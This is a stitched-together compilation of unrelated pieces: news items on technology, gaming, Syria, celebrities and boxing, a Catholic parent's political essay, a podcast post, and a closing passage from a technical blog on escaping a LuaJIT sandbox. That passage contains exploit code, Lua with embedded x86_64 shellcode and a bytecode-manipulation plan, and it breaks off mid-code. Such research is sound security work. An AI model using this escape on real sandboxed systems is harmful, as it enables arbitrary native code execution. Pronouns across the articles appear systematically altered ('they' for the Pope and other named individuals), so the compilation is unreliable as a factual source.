While we're on the subject of Whitehall Street induction center, here's some bonus history: the location became so notorious during the Vietnam draft that it found its way into Arlo Guthrie's classic "Alice's Restaurant:" "They got a building down New York City, it's called Whitehall Street/Where you walk in, you get injected, inspected, detected, infected/Neglected and selected." The center was such a symbol of military might that it became a target for an anti-war bombing in 1968 and 1969. The damage was minimal, but the center moved to Varick Street in 1972.
(Image via Gay Military Signal)
California to ban big screen tv's
The “guvernator” is leading California where no state has dared before. In a world first, big screen plasma televisions are to be banned in California because they use too much energy. Governor Arnold Schwarzenegger has given their backing to the move which would prohibit the sale of TV sets more than 40 inches wide.
California's utilities and environmental groups had urged state energy regulators to ban the most power-hungry televisions from stores as a way to lower electricity demand.
A rule before the California Energy Commission would impose the first energy-efficiency requirements for flat-screen televisions, a mandatory standard that is expected to be copied by other states.
“The goal here is a simple one,” Noah Horowitz, a scientist at the Natural Resources Defense Council, told commissioners at a hearing on Tuesday.
“We want to ensure that every TV sold in California is an efficient one,” Horowitz said.
A vote on the standard could come as early as next month.
Some manufacturers argue a mandatory power standard would hamper innovation, limit consumer choice and hurt California electronics retailers.
Energy commissioners say the rule could play a key role in reducing electricity use as consumers buy larger TVs. Watching TV accounts for about 10% of a home's electricity use and about 2% of California's total electricity usage. If left unchecked, the amount of electricity used by TVs is projected to rise by 8% a year. The LCD and plasma high definition sets can use as much as three times the power of smaller cathode ray models.
Under the rule, all TVs sold in California starting in 2013 would have to meet recently strengthened guidelines under the federal Energy Star program.
Doug Johnson, senior director of technology policy at the Consumer Electronics Association, said the commission's cost savings were overly optimistic and relied on data that fails to show the advancements made in TVs in recent years.
Via Times of India
Your browser does not support HTML5 video tag.Click here to view original GIF
Curious about just how far they could take the company's additive manufacturing technology, engineers at GE Aviation's Additive Development Center in Cincinnati successfully created a simple jet engine, made entirely from 3D printed parts, that was able to rev up to 33,000 RPM.
The additive manufacturing process that GE Aviation uses relies on a laser to melt layer after layer of metal powder until eventually a custom part is build up. It's similar to how a 3D printer like the MakerBot works, but being made from actual metal some of these parts have already been approved for use in planes by the FAA.
The miniature jet engine the engineers at GE built was actually a modified version of one you'd find in an RC model plane. As a result, it's incredibly simple and basic compared to the jet engines powering modern airliners. But the experiment helps add credence to the idea that 3D printing will eventually be used for more than just plastic trinkets. Eventually it will become an essential part of modern manufacturing. [GE]
GameStop is worried that digital games could drive game prices dangerously low, according to a statement from the company's president Tony Bartel in its most recent quarterly earnings report.
Bartel said that GameStop estimates that $100 million-worth of games have been digitally delivered for free as part of hardware bundles like the Xbox One Assassin's Creed Bundle and the PlayStation 4 upcoming Black Friday Bundle.
"We want to help ensure that our industry does not make the same mistake as other entertainment categories by driving the perceived value of digital goods significantly below that of a physical game," Bartel said (via Seekingalpha.com). "When the free digital token programs end, we believe that the industry will need to work together to continue to price goods in a way that sustains profitability and encourages a great innovation that this category needs."
Bartel also said that recent research indicated that the average price a consumer pays for a full, AAA game download is $22. When asked what price consumers expected to pay for a full game digital download, they said approximately $35.
Two important pieces of information that Bartel didn't mention about that study are which platforms did these consumers buy these games for (Console or PC, where platforms like Steam offer regular sales), and how long after the release of these games did consumers buy them for $22. Later in the call, Bartell said that $22 is "clearly an unsustainable price point for a game that physically is at $60."
How much do you expect to pay for full, digital games? Let us know in the comments below.
BEIRUT, Lebanon — Hours after they swept into the Syrian city of Palmyra last week, Islamic State militants carried out scores of summary executions, leaving the bodies of victims — including dozens of government soldiers — in the streets.
Then, residents say, they set about acting like municipal functionaries. They fixed the power plant, turned on the water pumps, held meetings with local leaders, opened the city's lone bakery and started distributing free bread. They planted their flag atop Palmyra's storied ancient ruins, and did not immediately loot and destroy them, as they have done at other archaeological sites.
Next came dozens of Syrian government airstrikes, some killing civilians. That gave the Islamic State a political assist: Within days, some residents had redirected the immediate focus of their anger and fear from the militants on the ground to the warplanes overhead.
In Palmyra, the Islamic State group appears to be digging into power in a series of steps it has honed over two years of accumulating territory in Iraq and Syria.
Ever since Pixar released Toy Story in 1995, movie studios (mostly Pixar itself) have been trying to replicate its success with similar movies about the secret lives of things/animals. Sometimes these movies work out really well and allow us to look at something normal in a fun and new way, but other times they're just aggressively lazy excuses to sell people a generic, uninspired plot with characters that look like recognizable things from real life. It's a bit early to know which of those two camps the emoji movie—which Sony Pictures Animation paid a ton of money for in July—will fall into, but maybe someone can make an educated guess now that Sony has released more information about the project.
As reported by /Film, Sony's Kristine Belson revealed some details about the plot of the emoji movie during the company's recent CinemaCon presentation. Predictably, the movie will be about the emojis inside someone's phone coming to life and living “in their own secret world” within the phone's texting app. For whatever reason, the hero emojis (we're gonna guess it'll be the little poop, the 100, and one of the faces) will have to leave their home app and “go to the world of the wallpaper,” which is like a video game-style overworld featuring a bunch of different apps that each contain their own universe. /Film says Sony showed concept art of emojis “taking a boat trip in a music app” that “didn't look too promising,” and the finished film will reportedly feature nods to “many popular apps.” Presumably, this will be the emoji movie's equivalent of Wreck-It Ralph's parade of classic video game characters and the many cameos in The Lego Movie, but with Neko Atsume instead of Pac-Man.
Advertisement
Sony has the emoji movie set to hit theaters on August 11, 2017.
ORLANDO - Gartner sees things like robots and drones replacing a third of all workers by 2025, and whether you want to believe it or not, is entirely your business.
This is Gartner being provocative, as it typically is, at the start of its major U.S. conference, the Symposium/ITxpo.
Take drones, for instance.
"One day, a drone may be your eyes and ears," said Peter Sondergaard, Gartner's research director. In five years, drones will be a standard part of operations in many industries, used in agriculture, geographical surveys and oil and gas pipeline inspections.
"Drones are just one of many kinds of emerging technologies that extend well beyond the traditional information technology world -- these are smart machines," said Sondergaard.
Smart machines are an emerging "super class" of technologies that perform a wide variety of work, both the physical and the intellectual kind, said Sondergaard. Machines, for instance, have been grading multiple choice for years, but now they are grading essays and unstructured text.
This cognitive capability in software will extend to other areas, including financial analysis, medical diagnostics and data analytic jobs of all sorts, says Gartner.
"Knowledge work will be automated," said Sondergaard, as will physical jobs with the arrival of smart robots.
"Gartner predicts one in three jobs will be converted to software, robots and smart machines by 2025," said Sondergaard. "New digital businesses require less labor; machines will be make sense of data faster than humans can."
Among those listening in this audience was Lawrence Strohmaier, the CIO of Nuverra Environmental Solutions, who said Gartner's prediction is similar to what happened in other eras of technological advance.
"The shift is from doing to implementing, so the doers go away but someone still has to implement," said Strohmaier. IT is a shift, although a slow one, to new types of jobs, no different than what happened in the machine age, they said.
The forecast of the impact of technology on jobs was also a warning to the CIOs and IT managers at this conference to consider how they will adapt.
"The door is open for the CIO and the IT organization to be a major player in digital leadership," said David Aron, a Gartner analyst.
CIOs have been steadily gaining authority, and 41% of CIOs now report to the CEO, a record level, said Aron. That's based on data from 2,810 CIOs globally.
To be effective leaders, Gartner argues that CIOs have shifted from being focused on measuring things like cost to being able to lead with vision and describe what their business or government agency must do to take advantage of smarter technologies.
It may only be Wednesday, but this is quickly turning into "Apologize to Nicolas Cage Week."
Star has issued an apology to the Oscar winner over a story the tabloid ran recently that claimed the actor had "stalked" Vanessa Hudgens while the two were making their movie, The Frozen Ground, Gossip Cop reports.
"In a story in the Sept. 17 issue, 'Creepy Cage Stalked their Costar,' we erroneously reported that Nicolas Cage had 'unnerved' High School Musical actor Vanessa Hudgens with their behavior on the set of their new thriller, The Frozen Ground," the magazine admitted in a statement. "Nic and Vanessa denied that any of the reported events occurred, and they confirmed that they're on excellent terms and are eagerly looking forward to the Nov. 30 release of their film. We apologize to Mr. Cage for the error and are happy to set the record straight."
Close
If you're a fan of creator and showrunner Rob Thomas' iZombie, there's a good chance that you're also a Marshmallow — that is, a devout follower of Thomas' cult classic teen noir Veronica Mars, which starred Kristen Bell in the titular role as a cynical high school sleuth with an arsenal of rapid-fire quips, which aired on UPN (and then the CW) from 2004-2007.
In iZombie's second season's most recently aired episode, titled "Real Dead Housewife of Seattle," crime-buster and medical examiner Liv Moore (played by Rose McIver), who is secretly a zombie, dropped the biggest Veronica Mars Easter egg the show has seen to date — and while recappers and critics have been going gaga over Thomas' nod to iZombies and Marshmallows alike — it's definitely not the first one and probably won't be the last.
The Easter egg itself was an allusion to the Veronica Mars theme song, a catchy, faux-'90s retro number by the Dandy Warhols that underscored the beginning of each episode. In iZombie's third episode of its sophomore season, Liv finds an old dress that used to belong to their former(ish) best friend, Peyton (Aly Michalka), who disappeared from their apartment in Seattle after discovering Liv's penchant for brains. When a new friend asks about the dress, Liv replies, "That belongs to someone. A long time ago, we used to be friends."
Thomas' CW-based iZombie (based on the Vertigo comic iZOMBIE, created by Chris Roberson and Mike Allred), which debuted its first season in March of this year, drew comparisons for some of its certain Mars-like qualities from the get-go: McIver's Liv is reminiscent of Mars' Veronica, from their blonde coifs to their propensity for solving crimes to authorial implementations, like narrative voice-overs. However, since iZombie's premiere, the show has more or less broken apart from the shadow of its predecessor.
Despite the long haul to recognize iZombie's originality and uniqueness as a show, Thomas' small salutes to their TV cult classic are usually met with delight — and are the opposite of few and far between, especially through the use of stunt casting. Ryan Hansen, who played the eternal frat-bro Dick Casablancas on Mars, has made a cameo in season 1 as Carson McCombs, a professional snowboarder sponsored by the villainous energy drink conglomerate Max Rager, as well as Percy Daggs III, who played the lovable Wallace Fennel, Veronica's best friend, did a stint as a tech entrepreneur named Sean. Adam Rose, who played the tech geek Max, also made an appearance as a hipster dog-lover on the undead dramedy's season 2.
Spoiler alert: Daggs and Rose's characters turn out to be the eventual perps — a nice twist on their sweet-demeanored characters in Veronica Mars).
Even Dick's dad, Richard Casablancas, Sr. (David Starzyk) stopped by for "Real Dead Housewife" — even though their character wasn't exactly long for this world in the episode. Lastly, the voice actor Daran Norris, who played Mars' recurring Cliff McCormack, a sleazy public defender with a heart of gold, showed up in the iZombie universe in the inaugural pilot.
While the Dandy Warhols line in "Real Dead Housewife" might seem like the pinnacle of Thomas' meta-fictive scavenger hunt, it wouldn't be surprising if fans of Thomas' work haven't seen the last of their Marshmallow props.
Check out the promo for the next episode of the CW's iZombie, which is set to air on Tuesday, Oct. 27.
Via: Wired
Be sure to follow T-Lounge on Twitter and visit our Facebook page.
ⓒ 2018 TECHTIMES.com All rights reserved. Do not reproduce without permission.
My social media accounts are bleeding red. A practicing Catholic, I have many friends and acquaintances who are voting Republican this year, in order to secure at least one conservative Supreme Court judge, and possibly even overturn Roe v. Wade. A Donald Trump vote, they say, would save millions of babies from abortion. A Trump vote is the only moral choice.
And as a practicing Catholic, I couldn't disagree more.
Four years ago I was lying in a darkened office in a Chicago-area hospital listening to my son's heartbeat when our obstetrician walked in and upended our lives forever. The baby on the ultrasound screen had not formed properly. Their neural tube had failed to fuse together, creating a hole at the base of their spinal column. Their tiny feet were clubbed inward. The buildup of spinal fluid on their brain was so immense that it had managed to push their cerebellum—the part of the brain responsible for motor control—down into their neck. I fought the urge to vomit, to run, as they scanned my burgeoning belly with their ultrasound wand and clicked their tongue disapprovingly. I can't even see the cerebellum, they said.
The diagnoses were many, and all of them terrifying: chiari malformations, bilateral clubbed feet, hydrocephalus, and spina bifida myelomeningocele.
Maybe this is the part of the essay where you're expecting me to say I terminated the pregnancy, and the GOP should keep their hands off women's bodies. The end. I read at least one of those essays every few months. But the truth is, I'm a practicing Catholic, and I identify as "pro-life." Put simply, this means that I think every life—every single one—has dignity and value, by the virtue of its humanity: immigrant lives, gay lives, black lives, poor lives, born and unborn, able-bodied and not. So I told the doctor I'd keep him, even though my teeth were chattering as I did it, and I begged God for the strength to ease them into a peaceful death, if it came to that. I was scared shitless, the kind of fear that makes it hard to draw a full breath.
Being "pro-life" is something I believe in strongly, and I try to reflect that politically when I can. Until four years ago, this meant voting for the GOP, the party who was loudly and unapologetically against abortion. But my son changed that.
Advertisement
Over the next several months, still pregnant, my husband and I visited an endless number of specialists, trying to come to terms with the level of care our son would eventually need: Right away he'd need surgery to repair their spinal cord, to sew up the hole in their back where it had failed to fuse. He'd need a permanent shunt to drain the fluid in their head. And beyond that—who knew? We had no idea what the future looked like, except that it stretched on in front of us endlessly, and I felt faint under the weight of it. I understood why parents would choose abortion, with news like this: It was like I had been thrust into a full-time job for the rest of my life that I didn't want and had never asked for—the life of a special needs parent. I didn't want this, God, I argued. I never asked for this.
When we welcomed Henry on a snowy day at the end of February 2013, they were fat and pink and beautiful, with a fine layer of red fuzz on the top of their head. They squawked, once, and settled grumpily into the doctor's outstretched hands, glaring at my husband and I, looking deeply irritated. As the doctor handed them to the chaplain to be baptized, I gasped for air, crying at their beauty. You're so beautiful, I kept weeping. How are you so beautiful? They had this hole in their back, but whatever. We'd get it fixed! We'd do whatever it took! And we could, too—because our private health insurance was awesome.
Henry stayed in the neonatal intensive care unit for 25 days and underwent two invasive surgeries: one to repair the defect in their back, the other to place a shunt in their head to control their hydrocephalus, a buildup of spinal fluid on their brain. They were nearly six months old when the hospital bill came, and their care, including my c-section, totaled a quarter of a million dollars. The insurance paid every dime.
Advertisement
I started to re-think what it meant to be “pro-life,” and how I lived that out politically.
I realized that thanks to Barack Obama—the guy I lamented in 2008—Henry would never have a lifetime cap for their medical care under any insurance, and they would never be denied insurance due to the condition they were born with, all a result of the Affordable Care Act. Our insurance was fantastic—but for expenses it didn't cover, the act allowed us to apply for a Medicaid waiver on behalf of Henry. I nearly wept.
The money we saved on their medical care allowed me to stay home with them and watch them thrive. And for the next four years, they did, beyond anything I could have imagined. Despite their complex medical condition, Henry blossomed into a social, talkative little boy who became the “clown” of our family. We lunged at every social service offered to us—from occupational and physical therapies provided by the state's Early Intervention program to the food stamp, Medicaid, and social security benefits afforded to them due to their diagnosis.
Advertisement
In 2014, the current governor of Illinois, where we live, was elected on a pro-family, anti-abortion platform. They went on to slash Early Intervention by $23 million in an attempt to balance the state budget, and thanks to said budget negotiations, froze payments for Early Intervention therapists. Additionally, they proposed increasing the eligibility guidelines for Early Intervention services—a move that would have excluded thousands of special needs children from the program. Thanks to an enormous outcry from angry parents, this proposal was quickly tabled. Never again, I vowed at the time, seething after our therapist told us they wouldn't be able to offer Henry care if the state budget didn't pass. Never again would I vote for a “pro-life” politician simply because they give lip service to being “pro-life.”
This was not the first time that so-called “pro-life” politicians have tried to erode the social programs that enable parents to care for their disabled or otherwise vulnerable children. Self-proclaimed “pro-life” Republicans are notorious for cutting funds for the services we special needs parents use to raise our children. Now, when terrified parents who have just received a spina bifida diagnosis for their unborn child contact me and want to know how they can possibly make this work? It's becoming harder and harder for me to reassure them that it's possible.
This year, I watched in horror as my friends heralded Donald Trump as the “pro-life” option for Catholics and Christians. And why? Because if you can believe a word this person says, they would appoint an anti-abortion Supreme Court justice (or two!) under their presidency. They might—hypothetically—overturn Roe v. Wade.
Advertisement
As a "pro-life" Catholic who's endured a crisis pregnancy, as the mother of a special needs child, I can only tell you this: Even if I agreed with criminalizing abortion (and I don't), none of what Trump is promising would have done a thing for me during my pregnancy. Having a conservative judge on the Supreme Court or de-funding a local Planned Parenthood would not have emboldened me to carry my child to term. It would not have helped me pay for Henry's medical care; it would not have done a thing to actually ensure Henry had the opportunities to live a full and productive life like he's living now.
None of these political promises mattered as I lay shaking in that ultrasound room four years ago. There was only the far-off whisper of God saying trust me, I got this, and the vague hope that our insurance would pick up the tab for this little boy who we desperately loved but could not afford. There was only the hope that someone would catch me if I took a leap of faith. Someone did—and it wasn't the GOP.
Please: Stop pretending that a man who literally mocked a disabled person actually gives a shit about my disabled son, or that he'll champion the programs that will make a difference for kids like him. Trump's top advisers, in fact, have a long political history of cutting funds to the programs special needs families use the most.
Advertisement
The Catholic Church tells us that we need to create a culture that respects the dignity of all human persons. But how we do that, specifically, is up to us. I cannot in good conscience vote for someone who has such disdain for the weak and marginalized, or someone who will destroy the same services that special needs families rely on to survive—the same services that enable mothers to carry to term.
I cannot, as a "pro-life," practicing Catholic, vote for Donald Trump.
Watch: We may have just lived through the most sexist election, ever.
Sarah Watts is a freelance writer and content strategist. Them writing has appeared in The Atlantic, The New York Times, Cosmopolitan, Salon, and others.
Microsoft may be pushing hard for digital distribution in the next console generation, but they seem to be doing everything in their power not to sell the idea to the general public.
It's been established that the Xbox One (and the PS4 for that matter) are not backward compatible, but now we're learning the full extent of just how not backward compatible they are. It's not just that they can't run 360 discs for technical reasons, it's that literally no old games will even work on the system, in any format. That means everything you've downloaded in your XBLA library under your gamertag will not work on the new system.
Microsoft's solution? Vice President Phil Spencer is back with yet another memorable quote, speaking to Gamespot:
"Those games will continue to run on your Xbox 360 for as long as your Xbox 360 runs," they said. "The box is not backward compatible and we think for somebody who invests in a large digital library that you want to keep your [Xbox 360]."
This is incredibly stupid, and not just for the obvious reasons that it sucks these games don't transfer and you'll have to hold onto your 360 to play them.
Rather, this is completely shattering any future case Microsoft can make about the virtues of digital distribution. The idea is that any game you download is attached to your account. No matter what happens, you'll have your digital library of games, even if you don't have the physical discs anymore. It's why many people, including me, don't really have a problem with the lack of "ownership" when it comes to digital distribution on platforms like Steam.
But what if you upgraded to the latest model of PC, and Steam suddenly told you that you better hang on to your old computer if you wanted to play any of your downloaded games?
The message this sends to consumers is that someday you could lose access to your library of titles you purchased digitally. Imagine if you spent thousands of dollars not downloading XBLA games, but actual AAA retail titles, and then suddenly when the Xbox Two comes out, it's also not backward compatible and won't transfer any of those purchases.
Obviously, this is not a new phenomenon. If you sold your N64, the Gamecube wouldn't play any of those games. But then if you sold your PS2 or original Xbox, the new system would play those titles, which is why people were so excited about backward compatibility. The point of digital distribution is that it should be easier to make backward compatibility happen, not harder, and we appear to be moving backwards.
This isn't a huge deal for some. Personally I don't trade in systems and have amassed quite a collection over the years. But I know that many, many people like to trade in their last-gen system for a steep Gamestop discount toward the new one. You can get as much as $200 toward the purchase of a new system by doing that, but now, you also lose your entire library of games, both physical and digital, if you do so.
All this says to people are that they should indeed fear digital distribution because it's possible their purchases will not follow them as technology evolves. Can you imagine having to hold on to your first-gen brick-shaped iPod because Apple declared your music wouldn't transfer to newer models? Microsoft really should have thought this through more, and understand the message it sends to their potential customers.
Follow me on Twitter here and subscribe to my Forbes blog here.
Fans and analysts often like to compare college football programs to one another. There are so many ways to do this: all time wins, national championships, Heisman winners, etc. But sometimes, it can be frustrating when certain teams had success “back in the day”, yet we all know that their program is by no means a powerhouse (for example, Princeton and its 28 national championships).
So we wanted to look at college programs since the start of the 21st century, and break it down by conference. After all, most fans want to know where their team stands in comparison to its big rivals. We started with the SEC and tallied which programs have notched the most conference wins in the 21st century (2001-present). We didn't include conference championship games — the logic is that a team which made and lost the championship game shouldn't be punished for having an extra postseason loss, as making the game in itself is an achievement.
Here's how the numbers shook out:
1. LSU – .729 winning percentage (70-26)
2. Florida – .708 winning percentage (68-28)
3. Georgia – .698 winning percentage (67-29)
4. Alabama – .646 winning percentage (62-34)
5. Auburn – .604 winning percentage (58-38)
6. Tennessee – .531 winning percentage (51-45)
7. South Carolina – .510 winning percentage (49-47)
8. Arkansas – .500 winning percentage (48-48)
9. Ole Miss – .344 winning percentage (33-63)
10. Mississippi State – .263 winning percentage (26-70)
11. Kentucky – .250 winning percentage (24-62)
12. Vanderbilt – .208 winning percentage (20-76)
What we learned:
It's all cyclical. Even the top teams on this list had some down years — it's just plain difficult to have uninterrupted success. Part of that can be attributed to coaching changes, as not one of the teams has had the same head coach for the whole time frame.
Despite Alabama's recent dominance, the Crimson Tide hasn't just run over everyone in the SEC. In fact, Alabama was just 27-29 in conference from 2001-2007 — a losing record.
The SEC has some really good teams, but the conference bottom-feeders are terrible. A third of the conference is really, really weak. With that being said, the SEC unquestionably still reigns supreme — the national title streak speaks for itself.
Note: Texas A&M and Missouri were not included because they only joined the conference in 2012. However, if you're keeping track, the Aggies are 6-2 (.750) and the Tigers are 2-6 (.250) in SEC play.
National News
At 3:40am this morning (Sunday 25th October) police were called to a group of eight males in the Palmerston North CBD that were suffering the effects of taking an unknown substance.
The males were initially taken into custody by police and then transported to Palmerston North hospital for treatment.
At this stage it is unknown what substance the group had taken was, and enquiries regarding the substance and its source are continuing.
“This is a timely reminder to people of the dangers of taking substances where they don't know the source” says Senior Sergeant Steve Crawford.
“If you are taking a substance that you don't know where it is from or what it contains, you are taking very serious risks with your health and you are putting your life at risk”.
ENDS
There will be no further media comment at this stage.
.- One of the nuns that lived in the monastery where the Pope will retire says their choice shows their “great simplicity” because it “is not a work of art or comparable with other Vatican buildings.”
“His decision to retire has surprised me, but they are very brave, although they are fragile and elderly,” said the nun from the Order of the Visitation of Holy Mary, who requested anonymity because of their cloistered life.
“But this decision is proof that they have a very lucid mind,” they stated, adding that “our self love does not allow us to see our own limitations, contrary to what Pope Benedict has done.”
“If I loved them before,” they declared, “now I love them even more.”
The sisters led a simple life with no staff. They spent their time praying and, for their 400th anniversary, made liturgical vestments for Pope Benedict to donate to poorer churches.
“One week before we left they asked us: ‘what will the Pope do without you?' and they asked us to keep praying for him,” said the nun.
“His decision has made us cry, but they have been very brave,” they added.
The monastery, called Mater Ecclesiae, is 4,300 square feet and lies just west of St. Peter's Basilica.
It contains a chapel, a choir room, a library, a semi-basement, a terrace and a visiting room that was added in 1993.
When Pope Benedict XVI announced on Feb. 11 that they were going to resign from the papacy and live in the convent, speculation began to circulate about when they made their decision, since renovations began in Nov. 2012.
According to the Spanish nun, who currently resides in a convent in Madrid, the building had not been refurbished in 18 years and needed minor repairs.
“We had humidity in the basement, the windows needed changing, and the terrace on top needed fixing and painting because of past snow,” they explained.
“But the building is very small, so they had to wait for us to leave to begin working on it.”
Reflecting on their experience living in the Vatican convent, the Visitation nun said they and their fellow religious felt intensely that they “were the heart of the Church.”
“It was an experience that is very hard to put into words.”
Their mission was to pray for the Pope, for their trips, and accompany them in prayer on a daily basis.
The Spanish nun recalled how Pope Benedict would often thank them for their prayers and regularly checked up on their general well-being.
They originally wanted French nuns to live in the monastery, they explained, but due to the small number of vocations in France they decided it would be better to pick them from Spain.
The monastery was established in 1994 by Blessed John Paul II as a place dedicated solely to prayer for the Pope, their ministry and the cardinals.
The order of the Visitation of St. Mary was picked from among many other religious groups to live in the monastery from Oct. 7, 2009 until Oct. 7, 2012.
Their stay was extended for 15 days and they left the monastery on Oct. 22, just after Bl. John Paul's feast day.
The seven sisters all came from convents in Spain, but one was from Colombia and another from Equatorial Guinea.
Here we are, the inaugural episode of the Mission: Nexus Podcast! We have appropriately titled this episode “We Have No Idea What We're Doing,” because none of us have ever made a podcast before. In this first episode, we introduce our hosts Datix, Domichi, Krissy and Skya, and we delve into a bit about ourselves before covering the latest news out of Carbine and the WildStar community. We laugh, we cry and we wax philisophical about Space Bacon and the aphrodisiac properties of Scrab claws. It's good old fashioned family fun!
UPDATE: This should have been linked below, but a special thanks to Jeff Kurtenacker (@JeffKurtenacker) for the music we used to intro/outro. We love that they share this with the community so early in the process. Find more here: https://soundcloud.com/inhisgroove/sets/wildstar-mmo-ost-cues
What's in this Episode?
00:00 Introduction of the podcast and hosts
07:13 Wildstar Wednesday Thursday: Crimson Isle 1
17:11 Discussion of Corey Loftis article from WildStarFans.net 2 (and some fanboy gushing)
25:07 We talk about PvP and Gazimoff's interview with Bardic 3
35:24 Why didn't Datix mention Tank/Healer in Rampant Speculation about classes? 4
39:30 Stormtalon's Lair discussion and BlackWolf and Mizpah's EU Arkship Posts on WSC 5
50:15 SVG and Late Night Dominion's Eldan Games Charity for Child's Play 6
57:15 We're too old for this s**t and grew up with first world problems
59:37 Listener Q&A from FateFlyer and wrap-up 7
So that's it! We want to try to keep it under an hour (this week ran a bit long) and will hopefully be bringing you new episodes every other week to start. So please, give it a listen and be gentle, but please provide us any and all feedback to tell us what you'd like to see out of the Mission: Nexus Podcast in future episodes. As always, we can be reached on Twitter at @MissionNexus!
Referenced Links
1. Crimson Isle overviews on WildStar Official Website
2. The Loftis Effect: Untamed Playful Imagination (WildStar Fans)
3. WildStar: The PvP Plans (ZAM)
4. Rampant Speculation: The Unknown Classes
5. A Tale of Two (EU) Arkships (WildStar Central)
6. SVG – Child's Play Event – Eldan Games – With Late Night Dominion (WSC Forums)
7. FateFlyer's Q&A Tweet (@FateFlyer on Twitter)
Share this:
Written by: Datix
MANILA, Philippines—Sarangani Representative and world boxing champ Manny Pacquiao revealed plans to retire from boxing in 2016.
Pacquiao, who has won an unprecedented eight boxing world titles in different divisions, said they might instead join the senatorial race under the United Nationalist Alliance (UNA).
ADVERTISEMENT
“There's a big possibility that I will run for Senator. UNA asked me to join its slate and I am grateful they picked me,” Pacquiao said in an interview on DZMM.
During previous interviews, Pacquiao said that they would have about five more fights before they retire. In their career, they have fought 63 fights –56 wins, five losses and two draws.
On November 22, Pacquiao will return to China for their next fight, taking on Chris Algieri in the gambling enclave of Macau.
The fight for a piece of the welterweight title held by Pacquiao comes a year after the boxing icon headlined the first big fight card there with a win over Brandon Rios.
Pacquiao suffered two consecutive defeats in 2012 to American Timothy Bradley and Mexican Juan Miguel Marquez.
They redeemed themselves somewhat in winning a Bradley rematch last April, following a convincing victory against Rios.
Their fighting skills and national fame have seen them earn fabulous wealth but they have since branched out into other pursuits, including as a Christian preacher, product endorser, television host, and elected member of the House of Representatives.
They caused shockwaves and much disbelief with their adoring Filipino fans by declaring their intention to become a playing coach for an expansion team in the Philippine Basketball Association.
Pacquio also expressed hopes to face another unbeaten American boxer Floyd Mayweather Jr. before they retire.
ADVERTISEMENT
There have been repeated efforts to negotiate such a fight but they have never prospered even as Mayweather, 37, declared that they will never face Pacquiao as long as they are promoted by Bob Arum.
Mayweather is known to be on bad terms with Arum, their former promoter, whom they accused of shortchanging him. With Agence France-Presse
RELATED STORIES
Read Next
LATEST STORIES
MOST READ
I have previously written about how malicious bytecode can be used to escape from a Lua 5.1 sandbox on 32-bit Windows, and other people have applied the same methods to attack redis instances.
It should come as no surprise that LuaJIT (as opposed to plain PUC-Rio non-JIT Lua) also has bytecode which can be used to escape from sandboxes, but it is nevertheless illustrative to work through the details of a full sandbox escape. The conclusion, as should be accepted knowledge by now, is that Lua should be sandboxed at the operating-system-process level, as opposed to at the Lua level.
For the purposes of this exercise, we'll escape from the following sandbox:
# include <lauxlib.h> # include <lualib.h> int main () { lua_State* L = luaL_newstate(); lua_cpcall(L, luaopen_jit, NULL); luaL_dofile(L, "evil.lua" ); lua_close(L); }
The sandbox executes arbitrary Lua code of our choice (the evil.lua file), and our aim is to escalate up to executing arbitrary native code of our choice. If the sandbox exposed LuaJIT's standard ffi library, then this would be trivial: call ffi.cdef to declare a prototype for mprotect (or VirtualProtect on Windows), call mprotect on some shellcode to make it executable, call ffi.cast to get a function pointer for the shellcode, and then call the function pointer. Of course, the sandbox does not expose the ffi library - nor does it expose the base library (hence no tostring or print or etc.) or the package library (no require ) or the string library (no string manipulation) or any other useful library. As its sole concession, the sandbox does load the jit library, as this library must be loaded in order for LuaJIT to actually do JIT compilation.
The particular environment we'll attack is LuaJIT commit 4f87367b (head of the v2.1 branch at time of writing), running on an x86_64 flavour of either Mac OSX or Linux, and compiled with LJ_64=1 and LJ_GC64=0 and LJ_FR2=0 (these being the current defaults for LuaJIT on x86_64).
The evil.lua file that we'll end up using will contain LuaJIT bytecode rather than Lua source code. Writing bytecode by hand is somewhat arduous, so instead we'll write Lua source code, compile it to bytecode, and then make a few surgical tweaks to the bytecode. The following rather long block of contains both the Lua source code to be compiled and manipulated, and the Lua source code for performing the compilation and manipulation.
local evil = function (v) local shellcode = "\76\139\87\16" .. "\184\4\0\0\2" .. "\191\1\0\0\0" .. "\72\141\53\51\0\0\0" .. "\186\12\0\0\0" .. "\15\5" .. "\72\133\192" .. "\184\74\0\0\2" .. "\121\12" .. "\184\1\0\0\0" .. "\15\5" .. "\184\10\0\0\0" .. "\73\139\58" .. "\72\139\119\8" .. "\186\7\0\0\0" .. "\15\5" .. "\73\139\114\8" .. "\72\137\55" .. "\195" .. "Hello World
" local function inner (...) if false then local cdata = - 32749 cdata = 0 cdata = 0 end local function s_byte (s) end local function s_char (i, _) end local function s_sub (s, i, j) end local function resync () return 0 LL end local function s_uint32 (s) local result = 0 for i = 4 , 1 , - 1 do result = result * 256 + s_byte(s_sub(s, i, i)) resync() end return result end local iaddr = (inner * 2 ^ 1022 * 2 ^ 52 ) % 2 ^ 32 local istr = (iaddr - 4 ) + 2 ^ 52 istr = - 32764 local pc = s_sub(istr, 5 , 8 ) istr = resync() pc = s_uint32(pc) local memory = (pc + 8 ) + 2 ^ 52 memory = - 32758 memory = memory + 0 local function m_uint32 (offs) local result = 0 for i = offs + 3 , offs, - 1 do result = result * 256 + (memory[i] % 256 ) end return result end local vaddr = m_uint32(m_uint32(iaddr + 24 ) + 16 ) local function low32 (tv) v = tv return m_uint32(vaddr) end local function ub4 (n) local result = "" for i = 0 , 3 do local b = n % 256 n = (n - b) / 256 result = result .. s_char(b) resync() end return result end local mctab_s = "\0\0\0\0\99\4\0\0" .. ub4(low32( "" ) + 2748 ) .. "\0\0\0\0\0\0\0\0\0\0\0\0\5\0\0\0\255\255\255\255" local mctab = low32(mctab_s) + 16 + 2 ^ 52 mctab = - 32757 local nop4k = "\144" for i = 1 , 12 do nop4k = nop4k .. nop4k end local ashellcode = nop4k .. shellcode .. nop4k local asaddr = low32(ashellcode) + 16 asaddr = asaddr + 2 ^ 12 - (asaddr % 2 ^ 12 ) local mcarea = mctab[ 1 ] mctab[ 0 ] = 0 mctab[ 1 ] = asaddr / 2 ^ 52 / 2 ^ 1022 mctab[ 2 ] = mctab[ 1 ] mctab[ 3 ] = mctab[ 1 ] mctab[ 4 ] = 2 ^ 12 / 2 ^ 52 / 2 ^ 1022 while mctab[ 0 ] == 0 do end local fshellcode = ub4(low32( "" ) + 132 ) .. "\0\0\0\0" .. ub4(asaddr) .. "\0\0\0\0" fshellcode = - 32760 fshellcode(mctab[ 1 ], mcarea) end inner() end local ffi = require "ffi" local bit = require "bit" local BC = {KSHORT = 41 , KPRI = 43 } local estr = string .dump(evil, true ) local buf = ffi.new( "uint8_t[?]" , #estr+ 1 , estr) local p = 